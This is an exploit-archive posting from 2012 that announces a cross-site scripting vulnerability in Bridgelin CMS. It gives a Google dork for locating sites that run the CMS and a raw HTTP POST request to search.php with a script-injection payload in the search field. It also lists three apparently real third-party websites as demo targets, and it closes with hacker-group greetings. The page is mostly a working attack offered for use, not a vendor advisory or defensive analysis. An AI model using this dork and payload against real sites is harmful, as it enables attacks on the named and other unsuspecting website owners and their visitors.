Home / exploits Bridgelin CMS Cross Site Scripting
Posted on 31 August 2012
<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ / /\_ __ |/ _(__ <| _/ \____| | / | Y Y / | \______ /|__| |__|__|_| /______ /____|_ / / / / / --> # Exploit Title: Bridgelin Cms Cross Site Scripting Vulnerability # # Google Dork: Intext:"Powered BY Bridgelin" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://www.bridgelin.com/ # # Tested on: all # ================================== Post data ------------------------ http://savouryorkregion.com/search.php Host: savouryorkregion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://savouryorkregion.com/search.php Content-Type: application/x-www-form-urlencoded Content-Length: 49 r_search=-+Please+Enter+A+Search+Term&search="><script>alert(0);</script> D3m0: http://savouryorkregion.com/search.php http://www.oftr.ca/search.php http://sherwoodparkra.com/search.php ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369
